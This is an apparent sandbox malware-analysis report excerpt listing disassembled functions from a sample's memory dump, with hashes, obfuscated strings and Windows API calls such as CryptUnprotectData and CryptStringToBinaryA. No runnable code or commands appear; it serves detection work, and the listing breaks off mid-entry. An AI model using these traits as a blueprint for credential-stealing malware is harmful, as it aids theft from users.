                            • Instruction ID: effa6cd7e1134b606d506853ab9b5c6e625db5a64e0cf4d5375ff7e4139254e0
                            • Opcode Fuzzy Hash: 46b8913d9f4e12d8c44c6b19d5ee59af1545bddccfc50148cad338030a01fc36
                            • Instruction Fuzzy Hash: 8DB12770900214CFD715CF58C988BA5B7F5FB44725F29C1AAE418AB2B2D7769E82CF90
                            Function 004D8D92 Relevance: 10.4, Strings: 7, Instructions: 1678COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 3M9=$=v|Y$G _r$^/}y$g@S$uW7o$w
                            • API String ID: 0-2757279503
                            • Opcode ID: e876cdb323ad723e27316e05ed251fffedb4c518d4a88dc55bf0a385a97a3e33
                            • Instruction ID: 71a831adbbde5e02d9afbff4fa4ec87d42a8f348b82597b96fe6d546a1790613
                            • Opcode Fuzzy Hash: e876cdb323ad723e27316e05ed251fffedb4c518d4a88dc55bf0a385a97a3e33
                            • Instruction Fuzzy Hash: F9B22AF3A0C2149FE3046E2DEC8567AFBE5EB94320F1A463DEAC5C7744E93598018697
                            Function 004DDF37 Relevance: 9.1, Strings: 6, Instructions: 1645COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !$4yz $NE~c$Qm5_$e0]?$g0[
                            • API String ID: 0-1897305345
                            • Opcode ID: c927746c9f473cd9e455e5301de06d1c17ae99bf70c430e93943c41364ffac0d
                            • Instruction ID: b4c0a213b6ee23cc067bf2661e196726bf3563f26d2bc7208e919a221240819d
                            • Opcode Fuzzy Hash: c927746c9f473cd9e455e5301de06d1c17ae99bf70c430e93943c41364ffac0d
                            • Instruction Fuzzy Hash: 7DB2F5F360C6009FE308AE2DDC8567AFBE9EF94720F16893DE6C5C3744E63598018696
                            Function 004DFA52 Relevance: 9.1, Strings: 6, Instructions: 1580COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 'Un+$8O:^$cF7$mO;$s+'e$w<om
                            • API String ID: 0-1144376598
                            • Opcode ID: 5ee980141ba50dfca37a6edc1bce546f7ba88e0827d894df141afda65e40172f
                            • Instruction ID: 71dfb0d2bd6255a8f3a34c45a1813fe1d75eceea7fcd58428b38762254865b60
                            • Opcode Fuzzy Hash: 5ee980141ba50dfca37a6edc1bce546f7ba88e0827d894df141afda65e40172f
                            • Instruction Fuzzy Hash: EFB2D5F3A0C2049FE304AE2DEC8567ABBE9EF94720F1A853DE6C4C7744E63558058697
                            Function 00142DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00142E12
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00142E19
                            • GetTimeZoneInformation.KERNEL32(?), ref: 00142E28
                            • wsprintfA.USER32 ref: 00142E53
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            • Opcode ID: 318d1ea1afccfcc4a64b227b30d35fcceb1ce415b5af937294c5fcbb0c6890c2
                            • Instruction ID: 1bb0069c8a905acea5b5c8bc14d8c567cf4d4d073ca23dc2f712382336c56139
                            • Opcode Fuzzy Hash: 318d1ea1afccfcc4a64b227b30d35fcceb1ce415b5af937294c5fcbb0c6890c2
                            • Instruction Fuzzy Hash: 75012B71A00704EBD7189F58DC49F6AB76DEB84721F00436AFD15DB3D0D774190086D1
                            Function 00127750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0012775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00127765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0012778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 001277AD
                            • LocalFree.KERNEL32(?), ref: 001277B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: b5558514aec9ae0ade5a42ef1318b39455bf2c51e9d6a5c879ea35c58b4125d7
                            • Instruction ID: c2fdc5ae19365f9cc3673088f4023bacabc4fd7189780feca9b0c58d64614d1f
                            • Opcode Fuzzy Hash: b5558514aec9ae0ade5a42ef1318b39455bf2c51e9d6a5c879ea35c58b4125d7
                            • Instruction Fuzzy Hash: 5A012575B40318BBEB10DB94DC4AFAA7B7CEB44B15F104555FB09EB2D0D6B09900C790
                            Function 004E4B15 Relevance: 6.5, Strings: 4, Instructions: 1511COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: *,o$M )o$Tw"3$V8&
                            • API String ID: 0-3806578423
                            • Opcode ID: ffc3f34a185c27711c71e88373e4d4879f5699810ee36feb03005d8ae1ac9251
                            • Instruction ID: a00c55f3c57213faf525e0fc14a4ba7689a024cc00feea6f393196cda90c662e
                            • Opcode Fuzzy Hash: ffc3f34a185c27711c71e88373e4d4879f5699810ee36feb03005d8ae1ac9251
                            • Instruction Fuzzy Hash: 5CA205F3A0C6149FE3046E2DEC8567ABBE9EF94720F1A493DE6C4C3744EA3558018697
                            Function 004ED415 Relevance: 6.2, Strings: 4, Instructions: 1243COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :nJ$H2}p$O_ $ZR{o
                            • API String ID: 0-1834902799
                            • Opcode ID: 25b776f7a92be206ea4fe60601a696184b0ed81a2171dd096f46fe05507b1c61
                            • Instruction ID: 9d1268ff9723b61ae37b106203f2a383f49a271e7c37dc2f40c0c9a1cc61e85b
                            • Opcode Fuzzy Hash: 25b776f7a92be206ea4fe60601a696184b0ed81a2171dd096f46fe05507b1c61
                            • Instruction Fuzzy Hash: CB8206F3A0C6109FE304AE29EC8567ABBE5EF94320F168A3DE6C5C3744E63558418697
                            Function 0012EB80 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0012EBC6
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0012EBCE
                            • lstrcat.KERNEL32(0014CFF4,0014CFF4), ref: 0012EC77
                            • lstrcat.KERNEL32(0014CFF4,0014CFF4), ref: 0012EC99
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: ec9ec331ca2e0debac5a9a06b38bd088f50540d8ff7a4cd2bcf894465aeffb10
                            • Instruction ID: dda116ea9fb7e028563d807f4d7a9fd426b789dbc2af443a75c81a664ff20a69
                            • Opcode Fuzzy Hash: ec9ec331ca2e0debac5a9a06b38bd088f50540d8ff7a4cd2bcf894465aeffb10
                            • Instruction Fuzzy Hash: 1B31E776A00219ABDB11CB98EC46BEEBB7DDF84705F044166F908F2290DBB05A148BE1
                            Function 001442C0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 001442DD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 001442EC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 001442F3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00144323
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            • Opcode ID: be0c36120ad1c9c37a146398a24bce40696143e8e8dfaad75761ec02d3217355
                            • Instruction ID: 923a27542639162e7d1c7db6083e10f2c7399e3a8ce7fcfd54e08062d918ccf6
                            • Opcode Fuzzy Hash: be0c36120ad1c9c37a146398a24bce40696143e8e8dfaad75761ec02d3217355
                            • Instruction Fuzzy Hash: 71011A70600205BBDB109FA5EC89FAABBADEF89312F108559BD0997260DB7099418B64
                            Function 00129B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00129B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00129B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00129B61
                            • LocalFree.KERNEL32 ref: 00129B70
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: a95b5970dd57fde8afd2544d8d44834bac72f7ac9f9fdcdfbd6d79a8fabd63a2
                            • Instruction ID: d4c6412c0a39a3b2ae2868ef09545beb0a4e74803cb97944c42c73b837bdc581
                            • Opcode Fuzzy Hash: a95b5970dd57fde8afd2544d8d44834bac72f7ac9f9fdcdfbd6d79a8fabd63a2
                            • Instruction Fuzzy Hash: ECF01D71340322ABF7311F68AC49F977BACEF04B52F240515FA45EA2D0D7B49850CAA4
                            Function 004E645A Relevance: 5.3, Strings: 3, Instructions: 1564COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
